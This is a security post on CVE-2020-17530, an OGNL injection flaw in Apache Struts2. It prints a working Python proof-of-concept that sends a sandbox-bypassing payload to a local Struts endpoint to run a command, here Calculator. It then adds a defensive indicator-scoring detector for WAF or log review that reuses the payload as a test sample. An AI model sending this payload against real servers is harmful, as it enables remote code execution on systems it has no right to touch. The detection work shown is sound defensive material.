CVE-2020-17530: Remote code execution in Apache Struts2
Severity: critical. The PoC has become publicly available and may have a significant and widespread impact. For those who have not had a chance to look at it yet, the code is below.
Python PoC:
# Affected versions: Apache Struts 2.0.0 through 2.5.25 (fixed in 2.5.26)
import requests
url = "http://127.0.0.1:8080/struts2_showcase_war/hello.action"
data = {
"name": '%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("/System/Applications/Calculator.app/Contents/MacOS/Calculator")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}'
}
res = requests.post(url, data=data)
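From the defensive side, the useful thing to take from the PoC is what its payload looks like on the wire: an OGNL expression wrapped in %{...}, a chain of #variable assignments, and references to the sandbox members it has to tamper with (memberAccess, excludedClasses, excludedPackageNames) plus the helper classes it instantiates. The block below is an added example, not part of the original post or of any Struts tooling: a small indicator-based scorer that a WAF rule or log-review script could run over decoded request parameters. The indicator weights and the alert threshold are assumptions chosen for the example; the sample parameter values are constructed here, with the last one being the payload from the post.

```python
import re
from urllib.parse import unquote_plus

# Tokens the public PoC for CVE-2020-17530 depends on. Weights are an
# assumption for this example, not a published scoring scheme.
INDICATORS = {
    "memberAccess": 3,
    "excludedClasses": 3,
    "excludedPackageNames": 3,
    "org.apache.tomcat.InstanceManager": 3,
    "freemarker.template.utility.Execute": 4,
    "com.opensymphony.xwork2.util.ValueStack": 2,
    ".newInstance(": 2,
    ".exec(": 2,
}
OGNL_WRAPPER = re.compile(r"[%$]\{.*\}", re.DOTALL)  # %{...} or ${...}
OGNL_ASSIGN = re.compile(r"#\w+\s*=")                # #var=... assignments
ALERT_THRESHOLD = 5                                   # assumption for this example


def score_value(raw):
    """Score one raw parameter value; returns (score, list of matched indicators).

    The value is URL-decoded first so that percent-encoded payloads in access
    logs or WAF captures are scored the same as their decoded form.
    """
    value = unquote_plus(raw)
    score, matched = 0, []
    if OGNL_WRAPPER.search(value):
        score += 2
        matched.append("ognl-wrapper")
    assigns = len(OGNL_ASSIGN.findall(value))
    if assigns:
        score += min(assigns, 5)  # cap so one long chain does not dominate
        matched.append(f"ognl-assignments:{assigns}")
    for token, weight in INDICATORS.items():
        if token in value:
            score += weight
            matched.append(token)
    return score, matched


def scan_request(params):
    """Return [(param_name, score, matched)] for parameters at or above the threshold."""
    findings = []
    for name, raw in params.items():
        score, matched = score_value(raw)
        if score >= ALERT_THRESHOLD:
            findings.append((name, score, matched))
    return findings


# Payload string from the PoC in the post above, used here as a test sample.
PAYLOAD = (
    '%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"])'
    '.(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"])'
    '.(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap"))'
    '.(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context))'
    '.(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc))'
    '.(#emptyset=#instancemanager.newInstance("java.util.HashSet"))'
    '.(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset))'
    '.(#arglist=#instancemanager.newInstance("java.util.ArrayList"))'
    '.(#arglist.add("/System/Applications/Calculator.app/Contents/MacOS/Calculator"))'
    '.(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute"))'
    '.(#execute.exec(#arglist))}'
)

# Constructed sample requests: a normal value, a harmless-looking OGNL reference,
# a percent-encoded expression as it might appear in a log, and the PoC payload.
SAMPLE_REQUESTS = [
    {"name": "Alice"},
    {"name": "%{name}"},
    {"name": "%25%7B%28%23a%3D1%29%7D"},
    {"name": PAYLOAD},
]

if __name__ == "__main__":
    for params in SAMPLE_REQUESTS:
        for name, score, matched in scan_request(params):
            print(f"ALERT param={name} score={score} indicators={matched}")
```

Scoring rather than a single regex keeps the harmless %{name} style value below the threshold while the PoC payload scores far above it; the decode step matters because the same expression arrives percent-encoded in most captures.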
#rce #cve